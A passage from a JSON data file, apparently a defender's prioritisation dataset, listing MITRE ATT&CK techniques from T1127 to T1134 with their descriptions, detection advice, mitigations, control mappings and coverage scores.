+        "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
+        "url": "https://attack.mitre.org/techniques/T1127",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1127.001",
+                "name": "Trusted Developer Utilities Proxy Execution: MSBuild",
+                "url": "https://attack.mitre.org/techniques/T1127/001",
+                "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
+                "detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.4504828442857143,
+        "adjusted_score": 0.4504828442857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3142857142857143,
+            "mitigation_score": 0.2909090909090909,
+            "detection_score": 0.34
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.03619713
+    },
+    {
+        "tid": "T1127.001",
+        "name": "Trusted Developer Utilities Proxy Execution: MSBuild",
+        "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
+        "url": "https://attack.mitre.org/techniques/T1127/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1127",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.26666666666666666,
+        "adjusted_score": 0.26666666666666666,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1129",
+        "name": "Shared Modules",
+        "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n    \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n    \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n    \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.",
+        "url": "https://attack.mitre.org/techniques/T1129",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Module: Module Load",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.17172472142857143,
+        "adjusted_score": 0.17172472142857143,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.6"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.07142857142857142,
+            "mitigation_score": 0.12727272727272726,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00029615
+    },
+    {
+        "tid": "T1132",
+        "name": "Data Encoding",
+        "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+        "url": "https://attack.mitre.org/techniques/T1132",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1132.001",
+                "name": "Data Encoding: Standard Encoding",
+                "url": "https://attack.mitre.org/techniques/T1132/001",
+                "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1132.002",
+                "name": "Data Encoding: Non-Standard Encoding",
+                "url": "https://attack.mitre.org/techniques/T1132/002",
+                "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.2605191957142857,
+        "adjusted_score": 0.2605191957142857,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.08571428571428572,
+            "mitigation_score": 0.16363636363636364
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.02480491
+    },
+    {
+        "tid": "T1132.001",
+        "name": "Data Encoding: Standard Encoding",
+        "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
+        "url": "https://attack.mitre.org/techniques/T1132/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1132",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.19047619047619047,
+        "adjusted_score": 0.19047619047619047,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1132.002",
+        "name": "Data Encoding: Non-Standard Encoding",
+        "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ",
+        "url": "https://attack.mitre.org/techniques/T1132/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1132",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1133",
+        "name": "External Remote Services",
+        "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)",
+        "url": "https://attack.mitre.org/techniques/T1133",
+        "tactics": [
+            "Initial Access",
+            "Persistence"
+        ],
+        "detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Metadata",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.5285714285714286,
+        "adjusted_score": 0.5285714285714286,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.8",
+            "6.3",
+            "6.4",
+            "6.5",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.7",
+            "12.8",
+            "13.5",
+            "16.8",
+            "18.3",
+            "18.5",
+            "13.10",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "AC-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.4285714285714286,
+            "mitigation_score": 0.7090909090909091,
+            "detection_score": 0.12
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1134",
+        "name": "Access Token Manipulation",
+        "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
+        "url": "https://attack.mitre.org/techniques/T1134",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Process: Process Metadata",
+            "User Account: User Account Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1134.001",
+                "name": "Access Token Manipulation: Token Impersonation/Theft",
+                "url": "https://attack.mitre.org/techniques/T1134/001",
+                "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+                "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex),  ImpersonateLoggedOnUser , and  SetThreadToken  and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1134.002",
+                "name": "Access Token Manipulation: Create Process with Token",
+                "url": "https://attack.mitre.org/techniques/T1134/002",
+                "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
+                "detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1134.003",
+                "name": "Access Token Manipulation: Make and Impersonate Token",
+                "url": "https://attack.mitre.org/techniques/T1134/003",
+                "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.",
+                "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and  SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1134.004",
+                "name": "Access Token Manipulation: Parent PID Spoofing",
+                "url": "https://attack.mitre.org/techniques/T1134/004",
+                "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
